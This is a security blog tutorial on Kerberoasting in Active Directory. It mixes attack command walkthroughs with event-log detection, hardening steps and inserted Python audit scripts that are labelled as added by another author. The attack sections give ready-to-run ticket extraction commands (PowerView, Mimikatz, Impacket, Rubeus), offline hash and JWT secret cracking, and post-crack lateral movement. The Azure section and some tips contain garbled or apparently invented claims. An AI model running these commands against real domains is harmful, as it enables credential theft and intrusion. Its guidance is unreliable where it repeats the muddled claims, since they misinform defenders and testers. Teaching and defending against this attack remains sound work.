Breaking Into Active Directory: The Kerberoasting Attack That Bypasses Most Defenses + Video


Introduction:

Kerberoasting is a post-exploitation attack technique that targets Service Principal Names (SPNs) in Active Directory to crack service account passwords offline. By requesting a Ticket Granting Service (TGS) ticket for any service running under a user account, an attacker extracts the encrypted ticket and cracks the hash using brute-force or dictionary attacks—completely bypassing account lockout policies and evading most traditional detection mechanisms.

Learning Objectives:

  • Understand how Kerberoasting exploits Kerberos authentication in Active Directory environments.
  • Execute a Kerberoasting attack using native Windows tools and Impacket on Linux.
  • Implement detection and mitigation strategies, including strong service account passwords and Group Managed Service Accounts (gMSA).

You Should Know:

1. Extracting TGS Tickets with PowerShell and Mimikatz

This section expands on the core concept: an attacker with domain user credentials can request TGS tickets for any SPN. The `Get-DomainUser` function from PowerView (part of PowerSploit) enumerates users with SPNs, then `Request-SPNTicket` extracts the ticket for offline cracking.

Step‑by‑step guide:

  1. From a domain-joined Windows machine, launch PowerShell as a non‑admin user.
  2. Import PowerView: `Import-Module .\PowerView.ps1`
  3. Find all users with SPNs: `Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname`
  4. Request a TGS ticket for a target: `Request-SPNTicket -SPN "http/sql01.lab.local" -OutputFormat Hashcat` (saves the hash to a file).
  5. Alternatively, use Mimikatz: `kerberos::ask /target:http/sql01.lab.local`
  6. Export all tickets: `kerberos::list /export`
  7. Convert the `.kirbi` file to Hashcat format using `kirbi2john.py` or `tgsrepcrack.py`.

Linux equivalent using Impacket:

# Install Impacket
pip3 install impacket

# Request TGS tickets and dump the hashes
impacket-GetUserSPNs -request -dc-ip 10.0.0.1 lab.local/standarduser:Password123 -outputfile hashes.kerberoast

# Crack with hashcat (mode 13100)
hashcat -m 13100 -a 0 hashes.kerberoast rockyou.txt

2. Cracking TGS Hashes with Hashcat and John the Ripper

Once the TGS ticket hash is obtained (the ticket is encrypted with a key derived from the service account’s password – its NTLM hash when RC4 is used), it can be cracked offline, because service accounts often have weak, human‑memorable passwords.

Step‑by‑step guide:

  1. Verify the hash format – Kerberoast hashes start with `$krb5tgs$`.
  2. Use Hashcat mode 13100 for TGS-REP hashes:

# mask attack: brute‑force every 8‑character password
hashcat -m 13100 -a 3 hash.txt ?a?a?a?a?a?a?a?a
# dictionary attack
hashcat -m 13100 -a 0 hash.txt wordlist.txt --force

  3. For John the Ripper:

john --format=krb5tgs --wordlist=rockyou.txt hash.txt

  4. Optimize cracking by using rules: `-r rules/best64.rule` in Hashcat.
  5. If the hash doesn’t crack, check RC4 vs AES encryption – force RC4 by setting the service account’s `msDS-SupportedEncryptionTypes` to 0.
  6. On Windows, use `Rubeus.exe` to perform the entire attack in one command:

Rubeus.exe kerberoast /outfile:hashes.txt /tgtdeleg

3. Detecting Kerberoasting via Event Logs and Network Traffic

Proactive defense relies on identifying abnormal TGS requests. Attackers often request many tickets in a short time from a single host.

Step‑by‑step guide for blue teams:

  1. Enable auditing of Kerberos service ticket operations so that Event ID 4769 – “A Kerberos service ticket was requested” – is logged on every domain controller.
  2. Filter for events where `Ticket Encryption Type` is 0x17 (RC4) – suspicious because modern environments should use AES.
  3. Use PowerShell to query events (in a 4769 event, `Properties[5]` is the TicketEncryptionType field):

Get-WinEvent -FilterHashtable @{LogName='Security';ID=4769} | Where-Object {$_.Properties[5].Value -eq 0x17}

  4. Look for anomalies: a single user requesting tickets for dozens of unique SPNs within minutes.
  5. On Linux (Sysmon for Linux or Zeek):

# Let Zeek parse the capture with its default scripts; Kerberos traffic is written to kerberos.log
zeek -C -r capture.pcap
# keep only the TGS requests
grep -E "TGS" kerberos.log

  6. Use SIEM rules: detect `EventID 4769` with `TicketOptions` not containing `0x40810000` (forwardable) and high frequency.
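The two anomalies described above (RC4 tickets issued for user service accounts, and one principal collecting tickets for many distinct service accounts within minutes) as a small triage script run over exported 4769 records. This is an added example, not code from the post; the event records are constructed samples shaped like the 4769 EventData fields, and the five-minute window and the threshold of five distinct accounts are assumptions to be tuned against a real baseline.

```python
"""Triage exported 4769 events for Kerberoasting indicators.

Added illustration, not code from the original post. The records below are
constructed samples shaped like the EventData fields of Windows Security
event 4769 (TargetUserName, ServiceName, TicketEncryptionType, IpAddress);
the window and threshold are assumptions to be tuned to a real baseline.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17             # TicketEncryptionType for RC4-HMAC
AES_ETYPES = {0x11, 0x12}   # AES128-CTS-HMAC-SHA1-96, AES256-CTS-HMAC-SHA1-96

# Constructed sample events (not real telemetry). In 4769 the ServiceName is the
# account the ticket was issued for: computer accounts end in "$", krbtgt is the TGT.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:01", "user": "alice@LAB.LOCAL", "service": "FS01$", "etype": 0x12, "ip": "10.0.0.50"},
    {"time": "2024-05-01T09:00:02", "user": "alice@LAB.LOCAL", "service": "krbtgt", "etype": 0x12, "ip": "10.0.0.50"},
    # a legacy host still negotiating RC4 for a computer account: noisy, but not a user service account
    {"time": "2024-05-01T09:01:00", "user": "bob@LAB.LOCAL", "service": "PRINT01$", "etype": 0x17, "ip": "10.0.0.51"},
    # one workstation pulling RC4 tickets for six different user-account SPNs in 30 seconds
    {"time": "2024-05-01T09:10:00", "user": "standarduser@LAB.LOCAL", "service": "svc_sql", "etype": 0x17, "ip": "10.0.0.77"},
    {"time": "2024-05-01T09:10:05", "user": "standarduser@LAB.LOCAL", "service": "svc_iis", "etype": 0x17, "ip": "10.0.0.77"},
    {"time": "2024-05-01T09:10:11", "user": "standarduser@LAB.LOCAL", "service": "svc_backup", "etype": 0x17, "ip": "10.0.0.77"},
    {"time": "2024-05-01T09:10:16", "user": "standarduser@LAB.LOCAL", "service": "svc_sccm", "etype": 0x17, "ip": "10.0.0.77"},
    {"time": "2024-05-01T09:10:24", "user": "standarduser@LAB.LOCAL", "service": "svc_report", "etype": 0x17, "ip": "10.0.0.77"},
    {"time": "2024-05-01T09:10:30", "user": "standarduser@LAB.LOCAL", "service": "svc_mssql", "etype": 0x17, "ip": "10.0.0.77"},
]


def is_user_service_account(service_name):
    """True for tickets issued to user (non-computer, non-krbtgt) accounts."""
    name = service_name.lower()
    return not name.endswith("$") and name != "krbtgt"


def rc4_service_account_tickets(events):
    """Rule 1: RC4 (0x17) tickets issued for user service accounts."""
    return [e for e in events
            if e["etype"] == RC4_HMAC and is_user_service_account(e["service"])]


def burst_requesters(events, window=timedelta(minutes=5), threshold=5):
    """Rule 2: users that obtained tickets for >= threshold distinct user service
    accounts inside any sliding window. Returns {user: peak distinct accounts}."""
    by_user = defaultdict(list)
    for e in events:
        if is_user_service_account(e["service"]):
            by_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        peak = 0
        for i, (start, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - start <= window}
            peak = max(peak, len(in_window))
        if peak >= threshold:
            flagged[user] = peak
    return flagged


def triage(events):
    """Combine both rules into one list of alert strings."""
    alerts = []
    for e in rc4_service_account_tickets(events):
        alerts.append(f"RC4 ticket for {e['service']} requested by {e['user']} from {e['ip']}")
    for user, n in burst_requesters(events).items():
        alerts.append(f"{user} requested tickets for {n} distinct service accounts within 5 minutes")
    return alerts


if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

Rule 1 alone fires on the legacy print server only if its ticket were for a user account, which is why the computer-account filter matters; rule 2 ignores encryption type entirely, so it still catches a collector who requests AES tickets once RC4 has been disabled.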

4. Mitigation: Strong Passwords, gMSA, and Managed Service Accounts

The most effective fix eliminates weak service account passwords and prevents RC4 usage.

Step‑by‑step hardening guide:

  1. Enumerate all service accounts with SPNs:

Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName, PasswordLastSet, Enabled

  2. Change passwords to 25+ random characters (use `Get-Random` in PowerShell):

# 25 distinct printable ASCII characters (codes 33–126) joined into one string
$NewPass = -join ((33..126) | Get-Random -Count 25 | % {[char]$_})
Set-ADAccountPassword -Identity svc_sql -NewPassword (ConvertTo-SecureString $NewPass -AsPlainText -Force)

  3. Migrate to Group Managed Service Accounts (gMSA) where possible – gMSA passwords are 120+ random characters, rotated automatically:

# Create gMSA (requires a 2012+ domain controller and an existing KDS root key)
New-ADServiceAccount -Name gmsa_sql -DNSHostName sql01.lab.local -ServicePrincipalNames "http/sql01" -PrincipalsAllowedToRetrieveManagedPassword 'SQL01$'
# Allow the SQL host to use the account
Add-ADComputerServiceAccount -Identity SQL01 -ServiceAccount gmsa_sql

  4. Disable RC4 encryption for Kerberos via Group Policy: Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options → “Network security: Configure encryption types allowed for Kerberos” → only enable AES128/AES256.

  5. Regularly audit SPNs using:

# Linux with ldapsearch
ldapsearch -x -H ldap://dc.lab.local -D "cn=user,dc=lab,dc=local" -w pass -b "dc=lab,dc=local" "(servicePrincipalName=*)" servicePrincipalName
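The audit in steps 1 and 5 produces a list of SPN-bearing accounts; the script below turns that list into findings against the hardening steps 2 to 4 (stale password, RC4 still permitted by `msDS-SupportedEncryptionTypes`, gMSA exempt) and generates a replacement password from the OS CSPRNG. This is an added example, not code from the post: the account records are constructed samples of the attributes the `Get-ADUser` and `ldapsearch` queries return, and the 365-day maximum password age is an assumption.

```python
"""Audit SPN-bearing accounts for the weaknesses Kerberoasting relies on.

Added illustration, not code from the original post. The records below are
constructed samples of the attributes the Get-ADUser / ldapsearch queries
above return; the 365-day password age limit is an assumption.
"""
import secrets
import string
from datetime import datetime, timedelta

# msDS-SupportedEncryptionTypes bit flags
ENC_RC4_HMAC = 0x04
ENC_AES128 = 0x08
ENC_AES256 = 0x10
GMSA_CLASS = "msDS-GroupManagedServiceAccount"

# Constructed sample directory records (not from a real domain).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_sql", "objectClass": "user",
     "servicePrincipalName": ["MSSQLSvc/sql01.lab.local:1433"],
     "pwdLastSet": "2021-03-10", "msDS-SupportedEncryptionTypes": None},
    {"sAMAccountName": "svc_iis", "objectClass": "user",
     "servicePrincipalName": ["HTTP/webserver.lab.local"],
     "pwdLastSet": "2024-04-01", "msDS-SupportedEncryptionTypes": ENC_AES128 | ENC_AES256},
    {"sAMAccountName": "svc_backup", "objectClass": "user",
     "servicePrincipalName": ["backup/bk01.lab.local"],
     "pwdLastSet": "2024-04-20", "msDS-SupportedEncryptionTypes": ENC_RC4_HMAC | ENC_AES256},
    {"sAMAccountName": "gmsa_sql$", "objectClass": GMSA_CLASS,
     "servicePrincipalName": ["http/sql01"],
     "pwdLastSet": "2024-04-28", "msDS-SupportedEncryptionTypes": ENC_AES128 | ENC_AES256},
]


def allows_rc4(enc_types):
    """RC4 is accepted when the RC4 bit is set or the attribute is unset/zero
    (the domain controller then falls back to its default, which includes RC4)."""
    return enc_types is None or enc_types == 0 or bool(enc_types & ENC_RC4_HMAC)


def audit_spn_accounts(accounts, now, max_password_age=timedelta(days=365)):
    """Return {sAMAccountName: [findings]} for user accounts that carry an SPN
    and have at least one issue. gMSAs are skipped: their password is long,
    random and rotated by the domain controller."""
    findings = {}
    for acct in accounts:
        if not acct["servicePrincipalName"] or acct["objectClass"] == GMSA_CLASS:
            continue
        issues = []
        age = now - datetime.fromisoformat(acct["pwdLastSet"])
        if age > max_password_age:
            issues.append(f"password last set {age.days} days ago")
        if allows_rc4(acct["msDS-SupportedEncryptionTypes"]):
            issues.append("RC4 tickets allowed (msDS-SupportedEncryptionTypes)")
        if issues:
            findings[acct["sAMAccountName"]] = issues
    return findings


def generate_service_password(length=25):
    """Random printable-ASCII password drawn with replacement from the OS CSPRNG."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    for name, issues in audit_spn_accounts(SAMPLE_ACCOUNTS, datetime(2024, 5, 1)).items():
        print(name, "->", "; ".join(issues))
        print("  suggested new password:", generate_service_password())
```

Accounts with only AES bits set and a recent password produce no finding, so the output is the actual work list rather than every SPN in the domain.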

5. Simulating the Attack in a Lab Environment

To truly understand Kerberoasting, build a safe lab with VirtualBox and Windows Server 2019/2022.

Step‑by‑step lab setup:

  1. Install Windows Server 2019 as Domain Controller (IP 10.0.0.1).
  2. Create a domain lab.local. Add a Windows 10/11 client (join domain).
  3. Create a service user `svc_iis` with password `P@ssw0rd` (weak for testing) and register an SPN:
    setspn -A HTTP/webserver.lab.local lab\svc_iis
  4. On the client as a normal domain user, run:
    Rubeus.exe kerberoast /spn:HTTP/webserver.lab.local /format:hashcat
  5. Copy the hash to a Kali Linux VM and crack it with `hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt`.
  6. If successful, use the cracked password to authenticate as `svc_iis` and attempt a pass‑the‑hash or lateral movement.

6. API Security Parallel: JWT Token Cracking vs. Kerberos TGS

Just as TGS tickets rely on weak service account passwords, JSON Web Tokens (JWTs) often use weak secrets. Attackers can brute‑force the HS256 secret offline after capturing a token.

Step‑by‑step guide to crack JWT secrets:

  1. Capture a JWT (from browser dev tools or Burp Suite).
  2. Use `jwt_tool` or `crackjwt`:

git clone https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c -C -d rockyou.txt

  3. For automation, use `hashcat -m 16500` (JWT) with the same wordlists.
  4. Mitigation: Use RS256 (asymmetric) instead of HS256, rotate secrets, and store them in vaults like HashiCorp Vault.
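The mitigation in step 4 on the verifying side: an HS256 issuer/verifier that refuses secrets shorter than the 256 bits RFC 7518 section 3.2 requires (short, human-chosen secrets are exactly what the wordlist attacks above recover), pins the algorithm so a tampered header cannot downgrade it, and compares signatures in constant time. This is an added example, not code from the post or from jwt_tool; the 32-byte secret and the claims are constructed for the example.

```python
"""HS256 issue/verify with a minimum-secret-length check.

Added illustration, not code from the original post. RFC 7518 section 3.2
requires an HS256 key of at least 256 bits; the secret and sample claims
below are constructed for the example.
"""
import base64
import hashlib
import hmac
import json
import secrets

MIN_HS256_SECRET_BYTES = 32   # 256 bits, per RFC 7518 section 3.2


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _as_bytes(secret):
    return secret.encode("utf-8") if isinstance(secret, str) else secret


def hs256_secret_is_strong(secret):
    """Reject secrets shorter than the SHA-256 output size."""
    return len(_as_bytes(secret)) >= MIN_HS256_SECRET_BYTES


def sign_hs256(claims, secret):
    """Issue a compact JWT; refuses to sign with a weak secret."""
    if not hs256_secret_is_strong(secret):
        raise ValueError("HS256 secret must be at least 256 bits")
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode("ascii")
    sig = hmac.new(_as_bytes(secret), signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_hs256(token, secret):
    """Return the claims if the signature checks out, else None. The algorithm
    is pinned to HS256 so a modified header cannot switch to 'none' or RS256."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        sig = _b64url_decode(sig_b64)
    except ValueError:            # malformed structure, base64 or JSON
        return None
    if header.get("alg") != "HS256":
        return None
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = hmac.new(_as_bytes(secret), signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):  # constant-time comparison
        return None
    try:
        return json.loads(_b64url_decode(payload_b64))
    except ValueError:
        return None


# Constructed example: a vault-issued 256-bit secret and claims like the sample token above.
STRONG_SECRET = secrets.token_bytes(32)
SAMPLE_CLAIMS = {"sub": "1234567890", "name": "John Doe", "iat": 1516239022}

if __name__ == "__main__":
    tok = sign_hs256(SAMPLE_CLAIMS, STRONG_SECRET)
    print(tok)
    print(verify_hs256(tok, STRONG_SECRET))
    print(hs256_secret_is_strong("secret"))   # a 6-byte secret is rejected
```

With a 256-bit random secret the offline search space is 2^256 regardless of wordlist, which is what makes the `-m 16500` attack above irrelevant; rotating the secret and moving to RS256 then become defence in depth rather than the only line.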

7. Cloud Hardening: Azure AD Kerberoasting Equivalent

Azure AD and hybrid environments have a similar attack called “Azure Kerberoasting” or “SPN injection” using the `Set-AzureADServicePrincipal` cmdlet.

Step‑by‑step Azure AD testing:

  1. Enumerate Azure AD service principals with PowerShell:

Connect-AzureAD
Get-AzureADServicePrincipal | Select-Object DisplayName, ServicePrincipalNames

  2. Request a ticket for an on‑prem SPN synced to Azure AD Connect – the same TGS hash can be retrieved via `Invoke-Kerberoast` from the `StormSpotter` toolkit.
  3. For cloud‑only, abuse `keyCredential` upload to add your own public key to a service principal (Azure AD “Golden SAML” variant).
  4. Use `roadrecon` (Azure AD reconnaissance) to find misconfigured app registrations with weak secrets.

What Undercode Say:

  • Kerberoasting remains one of the most reliable AD attacks because it requires only a domain user account and no elevated privileges. Many organizations still neglect service account password complexity.
  • Detection is possible but often misconfigured – most SIEMs lack baseline tuning for 4769 events, and RC4 is still enabled by default. Shift to AES and gMSA to break the attack chain.

Prediction:

As organizations move to hybrid identities and cloud Kerberos (Azure AD Kerberos for file shares), attackers will adapt Kerberoasting techniques to cloud service principals. Expect tooling like “CloudKerberoast” to emerge within 12 months, targeting poorly secured app registrations and managed identities. Defenders must enforce FIDO2 or certificate‑based authentication for service accounts and adopt Continuous Access Evaluation (CAE) to limit token lifetime. The golden era of offline TGS cracking is not over—it’s merely shifting to the cloud.

Reported By: Infosec Cybersecurity – Hackers Feeds